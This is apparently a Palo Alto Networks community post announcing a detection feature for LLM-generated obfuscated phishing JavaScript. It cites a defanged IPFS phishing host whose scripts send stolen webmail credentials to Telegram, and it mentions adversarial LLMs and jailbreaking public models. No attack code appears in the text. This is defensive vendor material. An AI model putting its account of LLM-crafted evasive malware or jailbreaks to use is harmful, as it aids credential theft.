Stopping AI-Powered Threats: Palo Alto Networks Detects LLM-Generated Attacks in Real-Time

cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
L2 Linker

Title_Stopping-AI-Powered-Threats_palo-alto-networks.jpg

 

As AI-driven threats evolve, so must cybersecurity defenses. Palo Alto Networks introduces LLM-Generated Attacks Detection, an advanced security capability designed to counter threats created using large language models (LLMs). Cybercriminals are leveraging AI to craft sophisticated phishing campaigns, automate malware generation, and bypass traditional security measures with unprecedented speed and precision.

 

What is LLM Generated Attacks, and Why is it so Important?

 

Large Language Models (LLMs) have brought significant benefits to many industries. However, cybercriminals now exploit Generative AI to craft advanced, customized, and seemingly harmless malicious JavaScript that easily evades detection. Unlike traditional off-the-shelf tools like obfuscator.io, which generate predictable and detectable transformations, LLM-assisted malicious content appears more organic and benign. This allows obfuscated scripts to retain their harmful intent while mimicking legitimate behavior, rendering pattern-based detection methods ineffective.

 

The significance of LLM-generated attacks lies in their ability to bypass static analysis tools and make malicious code appear legitimate. This emerging technique poses a serious cybersecurity threat, as it enables the large-scale creation of malware variants. Adversarial LLMs, such as WormGPT and FraudGPT, are accelerating the adoption of this attack vector, underscoring the need for cybersecurity professionals to stay ahead of these evolving threats. Additionally, techniques like jailbreaking (e.g., via DeepSeek) allow adversaries to circumvent built-in safeguards in publicly available LLMs, further enabling highly sophisticated AI-driven attacks.

 

LLM Generated Attacks Example:

 

Our research team discovered obfuscated code designed to steal webmail login credentials from a Web 3.0 IPFS phishing page hosted at bafkreihpvn2wkpofobf4ctonbmzty24fr73fzf4jbyiydn3qvke55kywdi[.]ipfs[.]dweb[.]link. At the time of detection in November 2024, the identified JavaScript samples had not been observed on VirusTotal. These LLM-generated samples closely resembled existing phishing scripts but appeared organic and benign while mimicking legitimate behavior—yet still carried harmful intent.

 

Below is a screenshot of an obfuscated phishing script page alongside the corresponding de-obfuscated malicious JavaScript, which exfiltrates login credentials to Telegram.

 

Fig 1_Stopping-AI-Powered-Threats_palo-alto-networks.jpg

 

How Does Palo Alto Networks Identify, Detect, and Block LLM-Generated Attacks?

 

Our newly developed deep learning model prioritizes code intent and functionality, ensuring resilience against superficial changes. This approach, combined with real-time detection, allows us to effectively identify and block AI-generated phishing attempts.

 

When Will the Detection be Available?

 

The LLM-generated attack detection capabilities have been in production since January 2024 and is now available.

 

What Action Is Needed to Benefit from LLM-Generated Attacks?

 

To benefit from the enhanced detection capabilities, organizations should enable the real-time category to alert and follow the best practice guidelines provided in this live community post. Additionally, enabling decryption on the firewall is necessary so it can inspect the content. This functionality requires inline cloud analysis and PAN-OS 10.2 and higher.

 

 Additional Information

 

For a comprehensive understanding of URL Filtering Category Best Practices, please refer to the provided documentation. Additionally, vist our research team's blog to stay informed on the latest developments on LLM-generated attacks.

  • 175 Views
  • 0 comments
  • 0 Likes
Register or Sign-in
Labels
Top Liked Authors